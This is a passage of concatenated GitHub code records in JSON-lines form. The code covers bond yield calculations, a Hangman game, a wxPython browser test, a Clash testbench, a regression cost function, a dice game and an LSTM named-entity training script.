series with a MultiIndex\n    ser = df.stack(dropna=False)\n    ser.index.set_names(['tenor_wk', 'metric'], inplace=True)\n    return ser\n\ndef get_4wk_value(df: pd.DataFrame, holding_period, **kw):\n    # Calculate tenor in years.\n    # There should only be one tenor in the input DataFrame `df`.\n    tenors_wk = df.index.get_level_values(level=0).unique()\n    assert len(tenors_wk) == 1, tenors_wk\n    tenor_wk = tenors_wk[0]\n    tenor = tenor_wk_to_years(tenor_wk)\n\n    pr_s = df.loc[tenor_wk, 'pr_s']\n    # NOTE: this assumes that the freq == holding_period\n    pr_t_old = df.loc[tenor_wk, 'pr_t'].shift(1)#, freq='28D')\n    val = pr_s / pr_t_old\n    return val\n\ndef calculate_from_spot(\n    df_raw,\n    holding_period=28/364.,\n    # Equivalently,\n    # holding_period=4/52.,\n) -> pd.DataFrame:\n    \"\"\"\n    Calculate zero-coupon metrics (rate, factor, forward rate, etc.)\n    given `df_raw`, which contains annualized spot rates in percent.\n\n    TODO\n    Review holding_period. Namely, 364/28 = 13.0 trades/year. 
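(Equivalently, under this file's 364-day convention of 52 weeks x 7 days, a 28-day hold gives 52 / 4 = 13 holding periods per year.)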
But our actual\n    holding_period = 4 weeks = 28 days.\n    \"\"\"\n    # Get groups by column prefix\n    grps: Dict[str, List[Dict]] = get_col_groups(tuple(df_raw.columns.tolist()))\n    zcb_dict = dict()\n    for country, cols in grps.items():\n        # Convert each tenor into units of weeks\n        for item in cols:\n            item['tenor_wk'] = TENOR_WEEK_MAP[(int(item['tenor']), item['unit'])]\n        df = df_raw.rename(columns={\n            item['col']: item['tenor_wk']\n            for item in cols\n        })\n\n        # Since the U.S. Treasury uses a 365-366 day/year definition for\n        # calculating \"annualized rate\",\n        # (see https://home.treasury.gov/policy-issues/financing-the-government/interest-rate-statistics/interest-rates-frequently-asked-questions)\n        # convert rates into our definition, which is a 364-day\n        # year (7 days * 52.0 weeks = 364 days).\n        df *= 364 / 365.2\n\n        # Compute ZCB rates, factors, and forward rate & factor at each time t\n        zcb = (df / 100.).apply(get_zcb_curve_at_t, axis=1)\n\n        # Double-check that TimeDelta between DatetimeIndex values equals\n        # holding_period = 28 days\n        idx_timedelta = pd.Series(zcb.index.values - np.roll(zcb.index.values, shift=1)).iloc[1:]\n        assert pd.to_timedelta(idx_timedelta.unique()[0]).days == 28, idx_timedelta.unique()\n\n        # Calculate value at each tenor, assuming that we\n        # bought the bond and held for `holding_period` before selling.\n        val_df = (\n            zcb\n            .stack(0, dropna=False)\n            [['pr_s', 'pr_t']]\n            .swaplevel()\n            .sort_index()\n            .groupby(level=0, group_keys=False)\n            .apply(get_4wk_value, axis=1, holding_period=holding_period)\n            .T\n        )\n        val_df.columns = pd.MultiIndex.from_tuples([\n            (tenor_wk, 'val') for tenor_wk in val_df.columns\n        ], names=['tenor_wk', 'metric'])\n\n        # Merge 1-month value `val` into the DataFrame\n        zcb = zcb.merge(val_df, how='left', left_index=True, right_index=True)\n\n        # Final tweaks to indices\n        zcb.columns.set_names(['tenor_wk', 'metric'], inplace=True)\n        zcb.index.set_names(['date'], inplace=True)\n        zcb.sort_index(axis=0, inplace=True)\n        zcb.sort_index(axis=1, inplace=True)\n        assert (zcb.dtypes == np.float64).all(), f\"some columns have dtype != np.float64\"\n\n        # Replace non-sensical values with NaN\n        # For example, the 1-month forward rate of 1-month T-bills\n        zcb.loc[:, (4.0, 'fwd')] = float('nan')\n\n        zcb_dict[country] = zcb\n    return zcb_dict\n\ndef unstack_zcb_df(in_df):\n    df = in_df.copy()\n    idx_df = pd.DataFrame(df.columns.str.split('_').tolist(), columns=['tenor', 'figure'])\n    idx_df.tenor = idx_df.tenor.astype(float)\n    idx_df.replace(0.08, 7/364., inplace=True)\n    idx = pd.MultiIndex.from_frame(idx_df)\n    df.columns = idx\n    df = df.unstack().reorder_levels([1, 2, 0])\n    return df\n\ndef read_uszcb(\n    zcb_out_fp='./data/uszcb.csv',\n):\n    \"\"\"\n    Example of how to load DataFrame from uszcb.csv.\n    \"\"\"\n    df = pd.read_csv(\n        zcb_out_fp,\n        header=[0, 1],\n        index_col=0,\n        parse_dates=[0],\n        dtype=float\n    )\n    df.columns = pd.MultiIndex.from_tuples([\n        (int(float(tenor)), str(metric)) for tenor, metric in df.columns]\n    )\n    return df\n\ndef main(\n    zcb_out_fp='./data/final_proj/uszcb.csv',\n):\n    start_date = '1990-01-01'\n    end_date = '2022-12-16'\n\n    # Construct a DatetimeIndex containing dates to trade on.\n    # We choose to trade every 4 weeks, since this is the tenor of\n    # the 1-month T-bill that we will use for funding.\n    # We choose every 4th Wednesday to trade on.\n    daily_idx = pd.date_range(start_date, end_date)\n    first_wed = get_next_day_of_week(start_date, 2)\n    wed_idx_w_holidays = pd.date_range(first_wed, end_date, freq='28D')\n    assert all(date.day_of_week == 2 for date 
in wed_idx_w_holidays)\n\n wed_idx = pd.to_datetime([\n date for date in wed_idx_w_holidays\n # if date not in pd.to_datetime([\n # # Remove Wednesdays that fall on holidays\n # '2012-12-26', '2013-12-25', '2014-01-01', '2018-12-26',\n # '2019-12-25', '2020-01-01',\n # ])\n ])\n # assert len(wed_idx_w_holidays) > len(wed_idx)\n\n # Fetch Quandl yield curve (YC) data for each country\n countries = {\n 'USA': 'USD',\n }\n yc_dict = {\n country: (\n get_yc(f'YC/{country}', start_date=start_date, end_date=end_date, col_prefix=country.lower())\n .reindex(daily_idx)\n .fillna(method='ffill')\n .iloc[1:, :]\n ) for country in countries.keys()\n }\n yc_daily = pd.concat(yc_dict.values(), axis=1)\n yc_monthly = yc_daily.loc[wed_idx].copy()\n # yc_monthly = yc_monthly.loc['2001-01-01':].copy() # DEBUG\n zcb_all_countries = calculate_from_spot(yc_monthly)\n df = zcb_all_countries['usa']\n df.to_csv(zcb_out_fp)\n print(f'Wrote US ZCB rates to {zcb_out_fp}')\n\n return df\n\n\nif __name__ == '__main__':\n main(*sys.argv[1:])","repo_name":"samhtyler/finm-33150","sub_path":"final_proj.py","file_name":"final_proj.py","file_ext":"py","file_size_in_byte":15446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"1383618049","text":"import random\nimport string\n\nWORDLIST_FILENAME = \"words.txt\"\n\n\ndef load_words():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\ndef choose_word(wordlist):\n \"\"\"\n wordlist (list): list of words (strings)\n \n Returns a word from wordlist at random\n \"\"\"\n return random.choice(wordlist)\nwordlist = load_words()\n\ndef input_check (guess, letters_guessed):\n '''\n Input: guess, letters_guessed\n Check guess is a letter, is a vowel, is already guessed\n If not yet guessed, add to letters_guessed list\n Return: is_alpha, is_vowel, already_guessed, letters_guessed\n '''\n is_vowel = None\n already_guessed = None\n if str.isalpha(guess) == True: ### Check whether guess is a letter ###\n is_alpha = True\n if len (letters_guessed) > 0:\n if guess in letters_guessed:\n already_guessed = True\n if guess not in letters_guessed:\n letters_guessed.append(guess)\n already_guessed = False\n if len(letters_guessed) == 0:\n letters_guessed.append(guess)\n already_guessed = False\n if guess in 'aeiou': ### Check whether guess is a vowel ###\n is_vowel = True\n if guess not in 'aeiou':\n is_vowel = False\n if str.isalpha(guess) == False:\n is_alpha = False\n return is_alpha, is_vowel, already_guessed, letters_guessed\n\ndef get_guessed_word(secret_word, letters_guessed):\n '''\n secret_word: string, the word the user is guessing\n letters_guessed: list (of letters), which letters have been guessed so far\n returns: string, comprised of letters, underscores (_), and spaces that represents\n which letters in secret_word have been guessed so far.\n '''\n guessed_word = ''\n for i in range(len(secret_word)):\n if secret_word[i] not in letters_guessed:\n guessed_word += '_ '\n else:\n guessed_word += secret_word[i]\n return guessed_word\n\ndef get_available_letters(letters_guessed):\n '''\n letters_guessed: list (of letters), which 
letters have been guessed so far\n    returns: string (of letters), comprised of letters that represents which letters have not\n    yet been guessed.\n    '''\n    lowercase = string.ascii_lowercase\n    available_letters = ''\n    for i in lowercase:\n        if i not in letters_guessed:\n            available_letters += i\n    return available_letters\n    \ndef unique_letter (secret_word):\n    '''\n    Input: secret_word\n    Return: number of unique letters, unique letters list\n    '''\n    number_unique = 0\n    unique = []\n    for i in string.ascii_lowercase:\n        if i in secret_word:\n            number_unique += 1\n            unique.append(i)\n    return number_unique, unique\n\ndef remaining (is_alpha, is_vowel, already_guessed, guessed_word, remaining_guesses, remaining_warnings, guess, secret_word):\n    '''\n    Calculate remaining guesses and warnings\n    '''\n    if is_alpha == False:\n        if remaining_warnings == 0:\n            remaining_guesses -= 1\n        if remaining_warnings > 0:\n            remaining_warnings -= 1\n    if is_alpha == True:\n        if already_guessed == True:\n            if remaining_warnings == 0:\n                remaining_guesses -= 1\n            if remaining_warnings > 0:\n                remaining_warnings -= 1\n        if (is_vowel == True) and (guess not in secret_word) and (already_guessed == False):\n            remaining_guesses -= 2\n        if (is_vowel == False) and (guess not in secret_word) and (already_guessed == False):\n            remaining_guesses -= 1\n    return remaining_guesses, remaining_warnings\n\ndef print_statement (remaining_guesses, remaining_warnings, available_letters):\n    '''\n    Print remaining_guesses, remaining_warnings left; Available_letters\n    '''\n    if remaining_warnings > 1 and remaining_guesses > 1 :\n        print ('You have', remaining_guesses, 'guesses and', remaining_warnings, 'warnings left.\\n')\n    if remaining_warnings <= 1 and remaining_guesses > 1:\n        print ('You have', remaining_guesses, 'guesses and', remaining_warnings ,'warning left.\\n')\n    if remaining_guesses <= 1 and remaining_warnings <= 1:\n        print ('You have', remaining_guesses, 'guess and', remaining_warnings ,'warning left.\\n')\n    if remaining_guesses <= 1 and remaining_warnings > 1:\n        print ('You have', remaining_guesses, 'guess and', remaining_warnings, 'warnings left.\\n')\n    if remaining_guesses > 0:\n        print ('Available letters:', available_letters)\n    \ndef print_input_check ( is_alpha, is_vowel, already_guessed, guessed_word, guess, secret_word):\n    if is_alpha == False:\n        print ('\\nOops! That is not a valid letter.', guessed_word, \"\\n -----------\\n\")\n    if already_guessed == True:\n        print (\"\\nOops! You've already guessed that letter.\", guessed_word, \"\\n -----------\\n\")\n    if guess in secret_word and already_guessed == False :\n        print ('\\nGood guess:', guessed_word, \"\\n -----------\\n\")\n    if guess not in secret_word and is_alpha == True and already_guessed == False :\n        print ('\\nOops! 
That letter is not in my word.', guessed_word, \"\\n -----------\\n\")\n\ndef is_word_guessed(letters_guessed, unique):\n    '''\n    secret_word: string, the word the user is guessing; assumes all letters are\n    lowercase\n    letters_guessed: list (of letters), which letters have been guessed so far;\n    assumes that all letters are lowercase\n    returns: boolean, True if all the letters of secret_word are in letters_guessed;\n    False otherwise\n    '''\n    if set(unique) <= set(letters_guessed): ### check if secret_word is a subset of letters_guessed ###\n        flag = True\n    else:\n        flag = False\n    return flag\n\ndef hangman(secret_word):\n    '''\n    secret_word: string, the secret word to guess.\n    \n    Starts up an interactive game of Hangman.\n    \n    * At the start of the game, let the user know how many \n      letters the secret_word contains and how many guesses s/he starts with.\n    \n    * The user should start with 6 guesses\n\n    * Before each round, you should display to the user how many guesses\n      s/he has left and the letters that the user has not yet guessed.\n    \n    * Ask the user to supply one guess per round. Remember to make\n      sure that the user puts in a letter!\n    \n    * The user should receive feedback immediately after each guess \n      about whether their guess appears in the computer's word.\n\n    * After each guess, you should display to the user the \n      partially guessed word so far.\n    \n    Follows the other limitations detailed in the problem write-up.\n    '''\n    remaining_guesses = 6\n    remaining_warnings = 3\n    letters_guessed = []\n    number_unique, unique = unique_letter (secret_word)\n    \n    print ('Welcome to the game Hangman!\\n\\nI am thinking of a word that is', len(secret_word) ,'letters long. \\n -----------')\n    print ('You have 6 guesses and 3 warnings left.\\n\\nAvailable letters: abcdefghijklmnopqrstuvwxyz\\n')\n    \n    \n    while remaining_guesses > 0 and is_word_guessed(letters_guessed, unique) == False:\n        guess = str.lower (input ('Please guess a letter: ',))\n        is_alpha, is_vowel, already_guessed, letters_guessed = input_check (guess, letters_guessed)\n        guessed_word = get_guessed_word(secret_word, letters_guessed)\n        available_letters = get_available_letters(letters_guessed)\n        remaining_guesses, remaining_warnings = remaining (is_alpha, is_vowel, already_guessed, guessed_word, remaining_guesses, remaining_warnings, guess, secret_word)\n        print_input_check ( is_alpha, is_vowel, already_guessed, guessed_word, guess, secret_word)\n        print_statement (remaining_guesses, remaining_warnings, available_letters)\n\n    \n    ### Game ends ###\n    if remaining_guesses <= 0:\n        print ('Sorry, you ran out of guesses. The word was:', secret_word)\n    if is_word_guessed(letters_guessed, unique) == True:\n        score = remaining_guesses * number_unique\n        print ('Congratulations, you won! 
\\n Your total score for this game is:', score)\n\n\nif __name__ == \"__main__\":\n    # pass\n\n    # To test part 2, comment out the pass line above and\n    # uncomment the following two lines.\n    \n    secret_word = choose_word(wordlist)\n    hangman(secret_word)\n","repo_name":"binhyc11/MIT-course-6.0001","sub_path":"ps2_Hangman_part 2.py","file_name":"ps2_Hangman_part 2.py","file_ext":"py","file_size_in_byte":8724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5569457015","text":"import wx\nimport wx.lib.agw.aui\nimport webconnect\n\n\nclass MyFrame(wx.Frame):\n\n# def __init__(self, parent, id=-1, title='wx.aui Test', pos=wx.DefaultPosition, size=(800, 600), style=wx.DEFAULT_FRAME_STYLE):\n#     wx.Frame.__init__(self, parent, id, title, pos, size, style)\n\n\n\tdef __init__(self, parent, id=-1, title='Gecko test', pos=wx.DefaultPosition, size=(800,600), style=wx.DEFAULT_FRAME_STYLE):\n\t\twx.Frame.__init__(self, parent, id, title, pos, size, style)\n\n#\t\tself._mgr = wx.aui.AuiManager(self)\n\t\tself._mgr = wx.lib.agw.aui.AuiManager(self)\n# create the toolbar and URL bar controls\n\t\ttoolbar = wx.lib.agw.aui.AuiToolBar(self, -1, wx.DefaultPosition, wx.DefaultSize,\n                              wx.lib.agw.aui.AUI_TB_DEFAULT_STYLE)\n\n\t\t#m_urlbar = new wxComboBox(toolbar, wxID_URL, wxT(\"\"), wxPoint(0,0), wxSize(850,18));\n\t\t#urlbar = wx.ComboBox(toolbar, -1, pos=(0, 0), size=(850, 18), choices=authors, style=wx.CB_READONLY)\n\t\turlbar = wx.ComboBox(toolbar, -1, pos=(0, 0), size=(850, 18))\n\n\t\t#toolbar->AddControl(m_urlbar, wxT(\"Location\"));\n\t\ttoolbar.AddControl(urlbar,'Location')\n\t\ttoolbar.Realize()\n\t\t\n\t\t#m_browser = new wxWebControl(this, wxID_WEB, wxPoint(0,0), wxSize(800,600));\n\t\tself._browser = webconnect.wxWebControl(self)\n\n\t\t#add pane\n\t\tself._mgr.AddPane(urlbar, wx.TOP, 'Toolbar')\n\t\tself._mgr.AddPane(self._browser, wx.CENTER, 'Browser')\n\t\t# tell the manager to 'commit' all the changes just made\n\t\tself._mgr.Update()\n\t\tself._browser.OpenURI('www.opennet.ru')\n\n#\t\tself.Bind(wx.EVT_CLOSE, self.OnClose)\n\n\napp = wx.App()\nframe = MyFrame(None)\nframe.Show()\napp.MainLoop()\n\n#app = wx.App()\n#frame = wx.Frame(None, -1, 'Python Gecko Test')\n#wc = webconnect.wxWebControl(frame)\n#wc.OpenURI('www.opennet.ru')\n#frame.Show()\n#app.MainLoop()\n","repo_name":"kolosov/webconnect2","sub_path":"wcsip/wc_test.py","file_name":"wc_test.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"37547819332","text":"\n# Switch2 testbench\n# \n# Sébastien Deriaz\n# 05.12.2022\n\n\nfrom clash_testbench import Chronogram, Testbench, Signal\nfrom os.path import join, dirname\nimport numpy as np\n\nfrom sun_phy.mr_fsk.mr_fsk_modulator import Mr_fsk_modulator\n\nfilepath = join(dirname(__file__), '../../SunPhy/Switch2.hs')\n\n\ndef test_Switch2():\n    tb = Testbench(filepath, 'switch2')\n\n    cg = Chronogram(join(dirname(__file__), 'test_Switch2.json'))\n\n    tb.setInputs([\n        cg[\"A_valid_i\"],\n        cg[\"A_data_i\"],\n        cg[\"A_last_i\"],\n        cg[\"B_valid_i\"],\n        cg[\"B_data_i\"],\n        cg[\"B_last_i\"],\n        cg[\"ready_i\"],\n        cg[\"sel\"],\n    ])\n    tb.setExpectedOutputs([\n        cg[\"A_ready_o\"],\n        cg[\"B_ready_o\"],\n        cg[\"valid_o\"],\n        cg[\"data_o\"],\n        cg[\"last_o\"]\n    ])\n\n    tb.setActualOutputsNames([\n        \"A_ready_o (actual)\",\n        \"B_ready_o (actual)\",\n        \"valid_o (actual)\",\n        \"data_o (actual)\",\n        \"last_o (actual)\"\n    ])\n\n    cg.setTemplates({\n        \"A_ready_o 
(actual)\" : \"A_ready_o\",\n \"B_ready_o (actual)\" : \"B_ready_o\",\n \"valid_o (actual)\" : \"valid_o\",\n \"data_o (actual)\" : \"data_o\",\n \"last_o (actual)\" : \"last_o\"\n })\n\n\n tb.run()\n\n cg.setSignals(tb.getAllSignals())\n cg.saveSVG(join(dirname(__file__), 'test_Switch2.svg'))\n\n for s in tb:\n if s.isChecked():\n s.print(True)\n assert s.isValid(), s.message()\n else:\n s.print(True)","repo_name":"SebastienDeriaz/clash_sun_phy","sub_path":"src/Tests/Switch2/test_Switch2.py","file_name":"test_Switch2.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38442685582","text":"import matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\n# from lab_utils_uni import plt_intuition, plt_stationary, plt_update_onclick, soup_bowl\n\n\ndef compute_cost(x, y, w, b):\n # x - data, m examples\n # y -target vals\n # w, b - scalar - model parameters\n # returns total_cost of using w, b parameters for linear regression\n\n m = x.shape[0]\n cost_sum = 0\n\n for i in range(m):\n f_wb = w * x[i] + b\n cost = (f_wb - y[i]) ** 2\n cost_sum += cost\n\n total_cost = (1 / (2 * m)) * cost_sum\n\n return total_cost\n\n\nx_train = np.array([1.0, 2.0])\ny_train = np.array([300.0, 500.0])\n\n","repo_name":"pformela/python_ai","sub_path":"stanford/week1/cost_function.py","file_name":"cost_function.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38469830198","text":"\"\"\"\nName: Kizito Jegede\nID: Codestar007\nCourse: MSc CS - PoP 1\n\nAssignment Two: (Please refer to 'README.dm' for full specification)\nProgram Title: Hundred\nProgram Description: An interactive game in which two players take\n turns to roll a die. At the end of each turn, the\n score for that turn is added to the player's total\n score. The first player to reach or exceed 100 wins.\n\"\"\"\n\n\ndef main():\n \"\"\"The program starts execution here. It calls various\n functions to print game instructions, execute computer and human\n player turns, check and apply fair play rule (if required), apply\n tie break and prints the game result.\n \"\"\"\n\n computer_turns = 0\n human_turns = 0\n count_of_turns = 0\n computer_score = 0\n human_score = 0\n\n instructions() # print game instructions\n while not is_game_over(computer_score, human_score):\n play_result = play_game(count_of_turns, computer_turns,\n computer_score, human_turns, human_score)\n (count_of_turns, computer_turns, computer_score, human_turns,\n human_score) = play_result\n\n\t\t# Apply fair play rule if required; human gets one more turn\n if computer_score >= 100 and human_score < computer_score:\n human_turns += 1\n print(\"\\nTurn:\", human_turns, \" (Fair play) | You\")\n human_score += human_move(computer_score, human_score)\n\n while computer_score == human_score >= 100: # Tie breaker.\n play_result = play_game(count_of_turns, computer_turns,\n computer_score, human_turns, human_score)\n (count_of_turns, computer_turns, computer_score, human_turns,\n human_score) = play_result\n\n show_results(computer_score, human_score) # Print result\n\ndef play_game(count_of_turns, c_turns, c_score, h_turns, h_score):\n \"\"\"Function is implemented to streamline the lenght of code in\n \"main()\". 
It takes 5 parameters: count of turns, computer\n    turns, computer score, human turns, human score and returns the\n    updated values as a 5-tuple (int).\n    \"\"\"\n\n    # Computer Move call\n    count_of_turns += 1\n    c_turns += 1\n    print(\"\\nTurn:\", c_turns, \"| Computer\") # Computer's header\n    c_score += computer_move(c_score, h_score)\n\n    # Human Move call\n    h_turns += 1\n    print(\"\\nTurn:\", h_turns, \"| You\") # Human's header\n    h_score += human_move(c_score, h_score)\n\n    return (count_of_turns, c_turns, c_score, h_turns, h_score)\n\ndef instructions():\n    \"\"\"This function tells the player the rules of the game.\"\"\"\n    print(\"\"\"Below are the rules of the game:\n    1. You will take turns to play against the computer\n    2. The computer always plays first\n    3. On each turn, you roll a six-sided die as many times as\n    you wish, or until you roll a 1\n    4. Each number you roll, except a 1, is added to your\n    score this turn\n    5. But if you roll a 1, your score for this turn is zero, and\n    your turn ends\n    6. At the end of each turn, your score for that turn is added to\n    your total score\n    7. The first player to reach or exceed 100 wins the game.\n    8. If the computer reaches or exceeds 100 first, you will\n    get one additional turn\n    9. If you and the computer are tied with 100 or more,\n    you will both get another turn until the tie is broken.\"\"\")\n    print(\"\\nThe Game is starting....\")\n\ndef human_move(computer_score, human_score):\n    \"\"\"This function displays a player's and the computer's current\n    score, and how far behind (or ahead) the player is. Then repeatedly\n    asks whether the player wants to roll again. This continues until either:\n    - The player decides not to roll again. The function returns the\n    total of the rolls made during this move.\n    - The player rolls a 1. The function returns 0.\n    Arguments (Type):= current computer and human scores (*integer*).\n    \"\"\"\n\n    sum_of_rolls = 0\n    prompt = \"Roll die again? 'Y' or 'N':\"\n\n    print(\"Current scores:\", \"You =\", human_score, # print current score\n          \"| Computer =\", computer_score)\n    print(compare_scores(computer_score, human_score))\n\n    while True: # Asks whether player wants to roll again\n        if ask_yes_or_no(prompt):\n            this_roll = roll()\n            if this_roll == 1:\n                return 0\n            else:\n                sum_of_rolls += this_roll\n        else:\n            return sum_of_rolls\n\ndef compare_scores(computer_score, human_score):\n    \"\"\"This function constructs a comparison between the current human\n    and computer_score and returns a string value.\n    Arguments (Type):= current computer and human scores (*integer*).\n    \"\"\"\n\n    score_diff = human_score - computer_score\n    if score_diff > 0:\n        return \"You are \" + str(abs(score_diff)) + \" AHEAD of the Computer\"\n    elif score_diff < 0:\n        return \"You are \" + str(abs(score_diff)) + \" BEHIND the Computer\"\n    else:\n        return \"You are level with the Computer at \" + str(human_score)\n\ndef computer_move(computer_score, human_score):\n    \"\"\"This function has the computer roll some number of times,\n    displays the result of each roll, and the function returns the\n    result (either 0 or the total of the rolls). 
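As with the human player, rolling a 1 ends the computer's turn immediately with a score of 0 for that turn.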
The function uses an\n    algorithm to determine how many rolls to make: `gently` when the computer\n    is ahead and `aggressive` if it is behind.\n    Arguments (Type):= current computer and human scores (*integer*).\n    \"\"\"\n\n    total_of_rolls = 0\n    aggressive = 5\n    gently = 2\n\n    if computer_score - human_score <= 0: # Computer selects play style\n        style = aggressive\n    else:\n        style = gently\n\n    for i in range(1, 1 + style):\n        this_roll = roll()\n        print(\"Computer roll:\", i, \"number =\", this_roll)\n        if this_roll == 1:\n            return 0\n        else:\n            total_of_rolls += this_roll\n    return total_of_rolls\n\ndef is_game_over(computer_score, human_score):\n    \"\"\"Returns `True` if either player has 100 or more, and the players\n    are not tied, otherwise it returns `False`. Called only after\n    the human player's move.\n    Arguments (Type):= current computer and human scores (*integer*).\n    \"\"\"\n\n    return ((computer_score >= 100 or human_score >= 100)\n            and computer_score != human_score)\n\ndef roll():\n    \"\"\"Returns a random number in the range 1 to 6\"\"\"\n    from random import randint\n    return randint(1, 6)\n\ndef ask_yes_or_no(prompt):\n    \"\"\"Prints the prompt as a question to the player. Returns `True`\n    if player responds with a string with first character `'y'` or `'Y'`,\n    returns `False` if first character of player response is `'n'` or `'N'`;\n    otherwise it repeats the question until the player provides an acceptable response.\n    \"\"\"\n\n    response = input(prompt)\n    try:\n        if response[0] in {\"Y\", \"y\"}:\n            return True\n        elif response[0] in {'N', 'n'}:\n            return False\n        else:\n            return ask_yes_or_no(prompt)\n    except IndexError:\n        return ask_yes_or_no(prompt)\n\ndef show_results(computer_score, human_score):\n    \"\"\"Function is called when the game has ended to tell\n    whether the human player won or lost, and by how much.\n    Arguments (Type):= current computer and human scores (*integer*).\n    \"\"\"\n\n    if computer_score > human_score:\n        print (\"\\nGame Over!! You LOST by: \"\n               + str(computer_score - human_score))\n    else:\n        print (\"\\nGame Over!! 
You WON by: \"\n + str(human_score - computer_score))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Codestar007/PoP1_ExamPractice","sub_path":"AllRepos/assignment-two-hundred-Codestar007/Hundred.py","file_name":"Hundred.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"37591201054","text":"class Glass:\n def __init__(self, capacity_volume: [int, float], occupied_volume: [int, float]):\n if not isinstance(capacity_volume, (int, float)):\n raise TypeError\n if not capacity_volume > 0:\n raise ValueError\n self.capacity_volume = capacity_volume # объем стакана\n\n if not isinstance(occupied_volume, (int, float)):\n raise TypeError\n if occupied_volume < 0:\n raise ValueError\n self.occupied_volume = occupied_volume # объем жидкости в стакане\n\n\nif __name__ == \"__main__\":\n glass1 = Glass(200, 100) # экземпляр класса\n glass2 = Glass(500, 50) # экземпляр класса\n\n incorrect_capacity_volume_type = ...\n incorrect_occupied_volume_value = ...","repo_name":"LorenzoY2J/PythonPY200","sub_path":"Основы ООП/Практические задания/task1_Glass__init__/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72287168056","text":"import pandas as pd\nfrom collections import Counter\nimport time\nimport wandb\nimport pickle\nfrom wandb.keras import WandbCallback\nwandb.init(project=\"GALE_LIME_NER_LSTM_CRF_DISEASE\", entity=\"robofied\")\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.utils import pad_sequences\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\n'''\nTo create Neural Network architectures\n'''\nclass NeuralNetwork(object):\n #Setting properties to be used in Neural Network\n def __init__(self, data):\n self.n_sent = 1\n self.data = data\n self.words = list(set(data[\"Word\"].values))\n self.n_words = len(self.words)\n self.tags = list(set(self.data[\"Tag\"].values))\n self.n_tags = len(self.tags)\n self.empty = False\n agg_func = lambda s: [(w, p, t) for w, p, t in zip(s[\"Word\"].values.tolist(), s[\"POS\"].values.tolist(), s[\"Tag\"].values.tolist())]\n self.grouped = self.data.groupby(\"Sentence\").apply(agg_func)\n self.sentences = [s for s in self.grouped]\n \n\n def get_next(self):\n try:\n s = self.grouped[\"Sentence: {}\".format(self.n_sent)]\n self.n_sent += 1\n return s\n except:\n return None\n\n #To endcode data for training\n def Data_Encoding(self):\n labels = [[s[2] for s in sent] for sent in self.sentences]\n sentences = [\" \".join([s[0] for s in sent]) for sent in self.sentences]\n word_cnt = Counter(self.data[\"Word\"].values)\n vocabulary = set(w[0] for w in word_cnt.most_common(5000))\n self.max_len = 114\n word2idx = {\"PAD\": 0, \"UNK\": 1}\n word2idx.update({w: i for i, w in enumerate(self.words) if w in vocabulary})\n tag2idx = {t: i for i, t in enumerate(self.tags)}\n\n #Saving word2idx, tag2idx for later use\n with open('../data/word2idx.pkl', 'wb') as f:\n pickle.dump(word2idx, f)\n \n with open('../data/tag2idx.pkl', 'wb') as f:\n pickle.dump(tag2idx, f)\n\n X = [[word2idx.get(w, word2idx[\"UNK\"]) for w in s.split()] for s in sentences]\n X = pad_sequences(maxlen=self.max_len, sequences=X, padding=\"post\", value=word2idx[\"PAD\"])\n y = [[tag2idx[l_i] for l_i in l] for l in labels]\n y = pad_sequences(maxlen=self.max_len, sequences=y, 
padding=\"post\", value=tag2idx[\"|O\\n\"])\n self.X_tr, self.X_te, self.y_tr, self.y_te = train_test_split(X, y, test_size=0.2, shuffle=False)\n print(\"Completed till split\")\n \n #LSTM Model for training\n def LSTM_NN(self):\n wandb.config = {\"learning_rate\": 0.001,\n \"epochs\": 100,\n \"batch_size\": 128}\n \n word_input = keras.Input(shape=(self.max_len,))\n model = layers.Embedding(input_dim=self.n_words, output_dim=50, input_length=self.max_len)(word_input)\n model = layers.SpatialDropout1D(0.1)(model)\n model = layers.Bidirectional(layers.LSTM(units=100, return_sequences=True, recurrent_dropout=0.1))(model)\n out = layers.TimeDistributed(layers.Dense(self.n_tags, activation=\"softmax\"))(model)\n model = keras.Model(word_input, out)\n opt = keras.optimizers.Adam(learning_rate = 0.001)\n model.compile(optimizer=opt, loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\n self.history = model.fit(self.X_tr, self.y_tr.reshape(*self.y_tr.shape, 1), batch_size=32, epochs=20, validation_split=0.2, verbose=1, callbacks=[WandbCallback()])\n name = '../models/' + 'ckpt' +str(time.time()) + '.h5'\n model.save(name)\n print(\"Model saved in model directory...\")\n return self.history\n\n #Training Plots for Accuracy and Loss\n def Training_Plots(self):\n history = self.history\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n acc_fig_name = '../figures/' + 'ckpt_acc' +str(time.time()) + '.png'\n plt.savefig(acc_fig_name)\n plt.clf()\n\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n loss_fig_name = '../figures/' + 'ckpt_loss' +str(time.time()) + '.png'\n 